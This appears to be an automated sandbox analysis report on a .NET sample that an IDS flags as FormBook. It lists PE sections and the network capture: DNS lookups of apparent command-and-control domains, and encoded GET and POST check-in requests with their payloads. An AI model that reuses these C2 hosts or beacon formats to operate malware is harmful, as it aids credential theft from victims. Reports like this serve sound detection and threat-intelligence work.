add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc090c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x277c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbe964	0xbea00	ebc317f83abcc2816ba8a5c3f853b634	False	0.918157018442623	data	7.759806370210631	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x277c	0x2800	11d44c4c3d75f2eff5bebbdd61453536	False	0.8791015625	data	7.596091965714016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	dc3caec424c140825d37a64f38d50a47	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc20c8	0x2356	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9427371213796153
RT_GROUP_ICON	0xc4430	0x14	data	1.05
RT_VERSION	0xc4454	0x324	data	0.43283582089552236

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T15:12:17.574447+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.4	50009	194.9.94.85	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:11:49.775619030 CET	49845	80	192.168.2.4	85.159.66.93
Jan 10, 2025 15:11:49.780641079 CET	80	49845	85.159.66.93	192.168.2.4
Jan 10, 2025 15:11:49.780781031 CET	49845	80	192.168.2.4	85.159.66.93
Jan 10, 2025 15:11:49.788734913 CET	49845	80	192.168.2.4	85.159.66.93
Jan 10, 2025 15:11:49.793648958 CET	80	49845	85.159.66.93	192.168.2.4
Jan 10, 2025 15:11:50.492924929 CET	80	49845	85.159.66.93	192.168.2.4
Jan 10, 2025 15:11:50.493067980 CET	80	49845	85.159.66.93	192.168.2.4
Jan 10, 2025 15:11:50.493143082 CET	49845	80	192.168.2.4	85.159.66.93
Jan 10, 2025 15:11:50.496629953 CET	49845	80	192.168.2.4	85.159.66.93
Jan 10, 2025 15:11:50.501462936 CET	80	49845	85.159.66.93	192.168.2.4
Jan 10, 2025 15:12:14.355034113 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:14.359946966 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:14.363630056 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:14.378695011 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:14.383598089 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042826891 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042856932 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042870045 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042882919 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042896032 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042907000 CET	80	49993	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:15.042912006 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:15.042943954 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:15.042958975 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:15.894915104 CET	49993	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:16.913882017 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:16.918880939 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:16.918978930 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:16.933244944 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:16.938150883 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574299097 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574374914 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574387074 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574398041 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574409008 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574420929 CET	80	50009	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:17.574446917 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:17.574446917 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:17.574534893 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:18.441955090 CET	50009	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:19.461246967 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:19.466306925 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.466423988 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:19.481877089 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:19.486860991 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.486876011 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.486886978 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.486898899 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.486910105 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.486974955 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.487035036 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.487046003 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:19.487057924 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236526966 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236573935 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236589909 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236599922 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236694098 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:20.236932039 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236946106 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236964941 CET	80	50011	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:20.236998081 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:20.237013102 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:20.988810062 CET	50011	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.008490086 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.013838053 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.014007092 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.034313917 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.039196968 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.659981012 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660003901 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660017014 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660027981 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660041094 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660052061 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660065889 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:22.660135031 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.660177946 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.667779922 CET	50012	80	192.168.2.4	194.9.94.85
Jan 10, 2025 15:12:22.672584057 CET	80	50012	194.9.94.85	192.168.2.4
Jan 10, 2025 15:12:35.775333881 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:35.780199051 CET	80	50013	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:35.780338049 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:35.794936895 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:35.799976110 CET	80	50013	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:36.390014887 CET	80	50013	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:36.390036106 CET	80	50013	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:36.390156031 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:36.390842915 CET	80	50013	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:36.390907049 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:37.301706076 CET	50013	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:38.321126938 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:38.327189922 CET	80	50014	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:38.327279091 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:38.343216896 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:38.349020004 CET	80	50014	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:38.995687008 CET	80	50014	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:38.995704889 CET	80	50014	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:38.995840073 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:38.996977091 CET	80	50014	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:38.997041941 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:39.849342108 CET	50014	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:40.867012024 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:40.872195959 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.872775078 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:40.887387037 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:40.892293930 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892558098 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892587900 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892642021 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892669916 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892703056 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892729998 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892847061 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:40.892874956 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:41.554668903 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:41.554692030 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:41.554797888 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:41.555152893 CET	80	50015	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:41.555207014 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:42.449881077 CET	50015	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:43.460918903 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:43.465981960 CET	80	50016	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:43.466067076 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:43.476260900 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:43.481098890 CET	80	50016	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:44.071671009 CET	80	50016	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:44.071692944 CET	80	50016	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:44.071867943 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:44.073086023 CET	80	50016	172.67.131.144	192.168.2.4
Jan 10, 2025 15:12:44.073189020 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:44.074640036 CET	50016	80	192.168.2.4	172.67.131.144
Jan 10, 2025 15:12:44.079459906 CET	80	50016	172.67.131.144	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:11:49.658128977 CET	52681	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:11:49.769375086 CET	53	52681	1.1.1.1	192.168.2.4
Jan 10, 2025 15:12:05.688231945 CET	57599	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:12:06.151351929 CET	53	57599	1.1.1.1	192.168.2.4
Jan 10, 2025 15:12:14.274619102 CET	60256	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:12:14.349083900 CET	53	60256	1.1.1.1	192.168.2.4
Jan 10, 2025 15:12:27.680768013 CET	55442	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:12:27.690052032 CET	53	55442	1.1.1.1	192.168.2.4
Jan 10, 2025 15:12:35.758270025 CET	65408	53	192.168.2.4	1.1.1.1
Jan 10, 2025 15:12:35.772826910 CET	53	65408	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 15:11:49.658128977 CET	192.168.2.4	1.1.1.1	0x1333	Standard query (0)	www.tabyscooterrentals.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:05.688231945 CET	192.168.2.4	1.1.1.1	0xbd8c	Standard query (0)	www.ftaane.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:14.274619102 CET	192.168.2.4	1.1.1.1	0xa835	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:27.680768013 CET	192.168.2.4	1.1.1.1	0xd9b3	Standard query (0)	www.vavada-official.buzz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:35.758270025 CET	192.168.2.4	1.1.1.1	0x86d7	Standard query (0)	www.jyshe18.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 15:11:49.769375086 CET	1.1.1.1	192.168.2.4	0x1333	No error (0)	www.tabyscooterrentals.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 15:11:49.769375086 CET	1.1.1.1	192.168.2.4	0x1333	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 15:11:49.769375086 CET	1.1.1.1	192.168.2.4	0x1333	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:06.151351929 CET	1.1.1.1	192.168.2.4	0xbd8c	Name error (3)	www.ftaane.net	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:14.349083900 CET	1.1.1.1	192.168.2.4	0xa835	No error (0)	www.milp.store		194.9.94.85	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:14.349083900 CET	1.1.1.1	192.168.2.4	0xa835	No error (0)	www.milp.store		194.9.94.86	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:27.690052032 CET	1.1.1.1	192.168.2.4	0xd9b3	Name error (3)	www.vavada-official.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:35.772826910 CET	1.1.1.1	192.168.2.4	0x86d7	No error (0)	www.jyshe18.buzz		172.67.131.144	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:12:35.772826910 CET	1.1.1.1	192.168.2.4	0x86d7	No error (0)	www.jyshe18.buzz		104.21.4.23	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.tabyscooterrentals.xyz

www.milp.store

www.jyshe18.buzz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49845	85.159.66.93	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:11:49.788734913 CET	395	OUT	GET /4wxo/?N4ahwR=AuCk/wTI7zW3ld/u5V6UHMq4RcE0g/F9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8nltxO6UIdlQF5gha+7lDPiUWIden6rAvAG6A=&SJ3=vToHyHVhRPNLk HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.tabyscooterrentals.xyz User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 10, 2025 15:11:50.492924929 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 10 Jan 2025 14:11:50 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-10T14:11:55.3843528Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49993	194.9.94.85	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:14.378695011 CET	642	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 203 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 75 2b 58 54 30 53 30 5a 58 6d 4e 2b 77 6f 30 71 6c 32 2b 41 50 61 4a 38 72 37 64 6d 6e 34 32 37 69 41 3d 3d Data Ascii: N4ahwR=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBu+XT0S0ZXmN+wo0ql2+APaJ8r7dmn427iA==
Jan 10, 2025 15:12:15.042826891 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 14:12:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 15:12:15.042856932 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 15:12:15.042870045 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 15:12:15.042882919 CET	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 10, 2025 15:12:15.042896032 CET	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50009	194.9.94.85	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
